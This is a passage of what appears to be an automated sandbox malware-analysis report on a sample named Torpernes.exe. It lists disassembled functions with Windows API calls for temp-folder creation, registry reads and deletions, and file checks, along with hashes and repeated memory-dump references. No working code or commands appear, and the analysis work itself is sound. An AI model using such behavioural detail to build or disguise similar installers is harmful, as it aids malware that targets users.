                                              • Part of subcall function 004060AD: CharNextW.USER32(?,"C:\Users\user\Desktop\Torpernes.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031D7,C:\Users\user\AppData\Local\Temp\,74DF3420,004033E7), ref: 00406124
                                              • Part of subcall function 004060AD: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031D7,C:\Users\user\AppData\Local\Temp\,74DF3420,004033E7), ref: 00406137
                                            • CreateDirectoryW.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,74DF3420,004033E7), ref: 004031EC
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1713787917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1713769592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713806210.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1714025138.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1714025138.0000000000491000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Torpernes.jbxd
                                            Similarity
                                            • API ID: Char$Next$CreateDirectoryPrev
                                            • String ID: 1033$C:\Users\user\AppData\Local\Temp\
                                            • API String ID: 4115351271-517883005
                                            • Opcode ID: 3d998d15709ba1c8c7012b8d63c2b0775907459dc3a3b7907f04902c8abed42a
                                            • Instruction ID: 8b2d002bf29f08ae4a69d67461cf3cd98a6fdd65923c287cde6dfba4ee08c55e
                                            • Opcode Fuzzy Hash: 3d998d15709ba1c8c7012b8d63c2b0775907459dc3a3b7907f04902c8abed42a
                                            • Instruction Fuzzy Hash: D3D0C92254793131D95176263D06FCF194C8F0A35AF268477F805B91C2DB6C1A9289FE
                                            Function 004068A3 Relevance: 5.2, APIs: 4, Instructions: 236COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1713787917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1713769592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713806210.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1714025138.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1714025138.0000000000491000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Torpernes.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e72e59f555a85d1b49548c48dc107e5efb7d269c6a0859656746b6fab20b6e51
                                            • Instruction ID: f28e3593fe72fa88d01303aa629bfae6551304820caee053d49813df3e18db6a
                                            • Opcode Fuzzy Hash: e72e59f555a85d1b49548c48dc107e5efb7d269c6a0859656746b6fab20b6e51
                                            • Instruction Fuzzy Hash: C8A13371E00228CBEB28CFA8C8547ADBBB1FF44305F11816ED856BB281D7785A96DF44
                                            Function 00406AA4 Relevance: 5.2, APIs: 4, Instructions: 208COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1713787917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1713769592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713806210.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1714025138.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1714025138.0000000000491000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Torpernes.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: bb414ef0e65bf321abf07bbd08e76edc2da0d3e12e8fed8c444c6e9114ba168f
                                            • Instruction ID: 40010b11bd5e1f261aed15f7e9cc202cac7d7d8c55991c62282cde7851584d9c
                                            • Opcode Fuzzy Hash: bb414ef0e65bf321abf07bbd08e76edc2da0d3e12e8fed8c444c6e9114ba168f
                                            • Instruction Fuzzy Hash: 56911070E00228CBEF28CF98C8547ADBBB1FF44305F15816AD856BB291D7786A96DF44
                                            Function 004067BA Relevance: 5.2, APIs: 4, Instructions: 205COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1713787917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1713769592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713806210.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1714025138.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1714025138.0000000000491000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Torpernes.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a5fb046d9c3c9ca283d4840ae6e8db3033aada834af1b2e0d9ecb340531529c3
                                            • Instruction ID: a4dec85b4f2f277edf9575adfc9b4107c5501948401582118949625260c0d92c
                                            • Opcode Fuzzy Hash: a5fb046d9c3c9ca283d4840ae6e8db3033aada834af1b2e0d9ecb340531529c3
                                            • Instruction Fuzzy Hash: A4814471E04228CBEF24CFA8C8447ADBBB1FF44305F25816AD856BB281D7785A96DF44
                                            Function 004062BF Relevance: 5.2, APIs: 4, Instructions: 198COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1713787917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1713769592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713806210.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1714025138.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1714025138.0000000000491000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Torpernes.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4161f4b48ad52b85f764ef67eee8988566d0e70674352aa9bcb003f0198d5343
                                            • Instruction ID: dc611af4e4960d843407fd220347fea674e86b773e62b692a16a99b1be24d87e
                                            • Opcode Fuzzy Hash: 4161f4b48ad52b85f764ef67eee8988566d0e70674352aa9bcb003f0198d5343
                                            • Instruction Fuzzy Hash: 00815671E04228DBEF24CFA8D8447ADBBB0FF44301F21816AD856BB281D7785A96DF44
                                            Function 0040670D Relevance: 5.2, APIs: 4, Instructions: 180COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1713787917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1713769592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713806210.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1714025138.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1714025138.0000000000491000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Torpernes.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: acbe30f518018ad0c1a364654cf67894e7733891be0c42920e0fe83b48f95201
                                            • Instruction ID: 3610b17f62bca192734b572b66cd3339a03013c9b6e0bb783a95e3f6acf6850f
                                            • Opcode Fuzzy Hash: acbe30f518018ad0c1a364654cf67894e7733891be0c42920e0fe83b48f95201
                                            • Instruction Fuzzy Hash: 32711371E00228CBEF24CF98C8547ADBBB1FF48305F25806AD856BB281D7785A96DF54
                                            Function 0040682B Relevance: 5.2, APIs: 4, Instructions: 170COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1713787917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1713769592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713806210.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1714025138.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1714025138.0000000000491000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Torpernes.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6de570ad3fa47dcd8052fca1d6f9ef5d62ad7600836d6af3ef364bc7296d0c5e
                                            • Instruction ID: 83e3d6ef8d3793d26f8235816f1baf137dce58f43e4cd213034e7b89034c8eed
                                            • Opcode Fuzzy Hash: 6de570ad3fa47dcd8052fca1d6f9ef5d62ad7600836d6af3ef364bc7296d0c5e
                                            • Instruction Fuzzy Hash: A6713471E04228CBEF28CF98C854BADBBB1FF44305F25806AD856BB281D7785996DF44
                                            Function 00406777 Relevance: 5.2, APIs: 4, Instructions: 168COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1713787917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1713769592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713806210.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1714025138.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1714025138.0000000000491000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Torpernes.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f306a4bb0e5613ad4ec4576fd476604cb5277217a9209ae60d5df005b7fe234b
                                            • Instruction ID: 6cf9b392ad20ce94c36697269ad81bf6fab0dda8c890a4cc081d40373e766ecd
                                            • Opcode Fuzzy Hash: f306a4bb0e5613ad4ec4576fd476604cb5277217a9209ae60d5df005b7fe234b
                                            • Instruction Fuzzy Hash: 61714571E00228CBEF28CF98C8547ADBBB1FF44305F15806AD856BB281D7786A56DF44
                                            Function 004023E0 Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 00402C44: RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402C6C
                                            • RegQueryValueExW.ADVAPI32(00000000,00000000,?,00000800,?,?,?,?,00000033), ref: 00402411
                                            • RegCloseKey.ADVAPI32(?,?,?,0040A568,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AC
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1713787917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1713769592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713806210.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1714025138.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1714025138.0000000000491000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Torpernes.jbxd
                                            Similarity
                                            • API ID: CloseOpenQueryValue
                                            • String ID:
                                            • API String ID: 3677997916-0
                                            • Opcode ID: 5eb7271685ccce449077bc569c936a4616db7af525dbfbae994371d55690283d
                                            • Instruction ID: 9d55024387273f6a7c0563f92a3c4ea29f0c9f957f67b02d8b070afcb0f89ab0
                                            • Opcode Fuzzy Hash: 5eb7271685ccce449077bc569c936a4616db7af525dbfbae994371d55690283d
                                            • Instruction Fuzzy Hash: AC117371915205EEDF24CFA0C6889AFB7B4EF40359F20843FE042A72D0D7B85A41DB1A
                                            Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                            • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1713787917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1713769592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713806210.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1714025138.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1714025138.0000000000491000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Torpernes.jbxd
                                            Similarity
                                            • API ID: MessageSend
                                            • String ID:
                                            • API String ID: 3850602802-0
                                            • Opcode ID: 1e35525d120672e869d683ef422f83039e498a0a3938eec046c0fb709be980db
                                            • Instruction ID: 7d54afa231cb1f8c7a3a4a80f73c997e60b3fa4b780d2517d0265e202b390008
                                            • Opcode Fuzzy Hash: 1e35525d120672e869d683ef422f83039e498a0a3938eec046c0fb709be980db
                                            • Instruction Fuzzy Hash: 9A01D1317242109BF7295B389C09B6A3698E710318F10863EB915F62F1DA78DC138B4D
                                            Function 004022D5 Relevance: 3.0, APIs: 2, Instructions: 40registryCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 00402C44: RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402C6C
                                            • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 004022F4
                                            • RegCloseKey.ADVAPI32(00000000), ref: 004022FD
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1713787917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1713769592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713806210.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1714025138.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1714025138.0000000000491000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Torpernes.jbxd
                                            Similarity
                                            • API ID: CloseDeleteOpenValue
                                            • String ID:
                                            • API String ID: 849931509-0
                                            • Opcode ID: 96ec3f46e31e8d8926631eba8b22c0120c2010998feefbb2c0686238914befc4
                                            • Instruction ID: b182e0bc2c81f4fcecee075a6f063d6f800ab8c33dcfd7f55c1b94239cdc6c9b
                                            • Opcode Fuzzy Hash: 96ec3f46e31e8d8926631eba8b22c0120c2010998feefbb2c0686238914befc4
                                            • Instruction Fuzzy Hash: D9F06272A04210ABEB15AFF59A4EBAE7278DB04318F20453BF201B71D1D5FC5D028A6D
                                            Function 00401DC7 Relevance: 3.0, APIs: 2, Instructions: 21COMMON
                                            Download Yara Rule
                                            APIs
                                            • ShowWindow.USER32(00000000,00000000,00000001), ref: 00401DDD
                                            • EnableWindow.USER32(00000000,00000000), ref: 00401DE8
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1713787917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1713769592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713806210.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1714025138.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1714025138.0000000000491000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Torpernes.jbxd
                                            Similarity
                                            • API ID: Window$EnableShow
                                            • String ID:
                                            • API String ID: 1136574915-0
                                            • Opcode ID: e547ff1c4883477c98bffdb9ea0355e07f5189ce5117193cdd3c40a8c27eb6ea
                                            • Instruction ID: b6c53b4dd51b893cb22cddc6f1876016a56b3362795d6dcf841167b4bc481f4e
                                            • Opcode Fuzzy Hash: e547ff1c4883477c98bffdb9ea0355e07f5189ce5117193cdd3c40a8c27eb6ea
                                            • Instruction Fuzzy Hash: F4E08671B04104DBCB50AFF459489DD7378EB50359B100477F401F10D1C2785C008A3D
                                            Function 00405A85 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetFileAttributesW.KERNELBASE(00000003,00402DA9,C:\Users\user\Desktop\Torpernes.exe,80000000,00000003,?,?,?,00000000,00403455,?), ref: 00405A89
                                            • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403455,?), ref: 00405AAB
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1713787917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1713769592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713806210.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
